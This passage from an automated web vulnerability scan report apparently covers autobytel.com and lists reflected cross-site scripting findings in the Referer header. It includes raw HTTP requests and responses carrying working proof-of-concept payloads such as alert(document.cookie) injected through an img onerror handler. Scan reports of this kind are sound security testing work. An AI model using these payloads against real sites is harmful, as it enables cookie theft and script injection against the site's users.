Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=1a138"%3balert(1)//294e4adfe8b

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:58 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:58 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E1a138%22%3Balert%281%29%2F%2F294e4adfe8b;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 57772

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~1a138";alert(1)//294e4adfe8b";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47E7341A-C3F0-8BC0-F023176D
...[SNIP]...

4.1916. http://www.autobytel.com/content/buy/index.cfm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/index.cfm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload d4a1a--><img%20src%3da%20onerror%3dalert(1)>4a22cceb8c0 was submitted in the Referer HTTP header. This input was echoed as d4a1a--><img src=a onerror=alert(1)>4a22cceb8c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:14 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:14 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ed4a1a%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E4a22cceb8c0;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 57810

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>4a22cceb8c0 -->
...[SNIP]...

4.1917. http://www.autobytel.com/content/buy/warranty/index.cfm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/warranty/index.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cf66"%3balert(1)//49f2510b4ff was submitted in the Referer HTTP header. This input was echoed as 3cf66";alert(1)//49f2510b4ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/buy/warranty/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=3cf66"%3balert(1)//49f2510b4ff

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 39580
Expires: Mon, 24 Jan 2011 23:36:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:36:12 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:36:12 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:36:12 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E3cf66%22%3Balert%281%29%2F%2F49f2510b4ff;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~3cf66";alert(1)//49f2510b4ff";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47D6E7A8-DA33-12C1-BDD5AD25
...[SNIP]...

4.1918. http://www.autobytel.com/content/buy/warranty/index.cfm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/buy/warranty/index.cfm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 79d8a--><img%20src%3da%20onerror%3dalert(1)>d955c1d591b was submitted in the Referer HTTP header. This input was echoed as 79d8a--><img src=a onerror=alert(1)>d955c1d591b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:36:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:36:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:36:29 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:36:29 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E79d8a%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Ed955c1d591b;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 39618

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>d955c1d591b -->
...[SNIP]...

4.1919. http://www.autobytel.com/content/home/help/index.cfm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42ed3"%3balert(1)//0f0891904b3 was submitted in the Referer HTTP header. This input was echoed as 42ed3";alert(1)//0f0891904b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/home/help/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=42ed3"%3balert(1)//0f0891904b3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:43:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:43:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:43:56 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:43:56 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E42ed3%22%3Balert%281%29%2F%2F0f0891904b3;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45334

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~42ed3";alert(1)//0f0891904b3";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "481DE4D5-EBA6-BE43-8346E63C
...[SNIP]...

4.1920. http://www.autobytel.com/content/home/help/index.cfm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload cb3db--><img%20src%3da%20onerror%3dalert(1)>6e9f591d420 was submitted in the Referer HTTP header. This input was echoed as cb3db--><img src=a onerror=alert(1)>6e9f591d420 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:44:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:44:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:44:08 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:44:08 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ecb3db%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E6e9f591d420;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45372

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>6e9f591d420 -->
...[SNIP]...

4.1921. http://www.autobytel.com/content/home/help/index.cfm/action/about [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/about

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 9b173--><img%20src%3da%20onerror%3dalert(1)>95758ff5f56 was submitted in the Referer HTTP header. This input was echoed as 9b173--><img src=a onerror=alert(1)>95758ff5f56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /content/home/help/index.cfm/action/about HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=9b173--><img%20src%3da%20onerror%3dalert(1)>95758ff5f56

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:42:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:42:58 GMT
Content-Length: 32454
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:42:58 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:42:58 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E9b173%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E95758ff5f56;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>95758ff5f56 -->
...[SNIP]...

4.1922. http://www.autobytel.com/content/home/help/index.cfm/action/about [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/about

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b589"%3balert(1)//50ec6a055e4 was submitted in the Referer HTTP header. This input was echoed as 8b589";alert(1)//50ec6a055e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:42:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:42:51 GMT
Content-Length: 32416
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:42:51 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:42:51 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E8b589%22%3Balert%281%29%2F%2F50ec6a055e4;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~8b589";alert(1)//50ec6a055e4";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4813DB07-978D-A724-75E7E8DA
...[SNIP]...

4.1923. http://www.autobytel.com/content/home/help/index.cfm/action/contact [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/contact

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcb62"%3balert(1)//a0c00af98bd was submitted in the Referer HTTP header. This input was echoed as fcb62";alert(1)//a0c00af98bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/home/help/index.cfm/action/contact HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=fcb62"%3balert(1)//a0c00af98bd

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:01 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:01 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Efcb62%22%3Balert%281%29%2F%2Fa0c00af98bd;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 36701

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~fcb62";alert(1)//a0c00af98bd";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47DE7D83-94A8-B245-34B7EF85
...[SNIP]...

4.1924. http://www.autobytel.com/content/home/help/index.cfm/action/contact [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/contact

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 3ef12--><img%20src%3da%20onerror%3dalert(1)>8e8f0c27a06 was submitted in the Referer HTTP header. This input was echoed as 3ef12--><img src=a onerror=alert(1)>8e8f0c27a06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:09 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:09 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E3ef12%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E8e8f0c27a06;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 36739

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(1)>8e8f0c27a06 -->
...[SNIP]...

4.1925. http://www.autobytel.com/content/home/help/index.cfm/action/privacy [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/content/home/help/index.cfm/action/privacy

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 993ca"%3balert(1)//86d7bd50876 was submitted in the Referer HTTP header. This input was echoed as 993ca";alert(1)//86d7bd50876 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /content/home/help/index.cfm/action/privacy HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=993ca"%3balert(1)//86d7bd50876

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:10 GMT
Connection: close
Connection: Transfer-Encoding
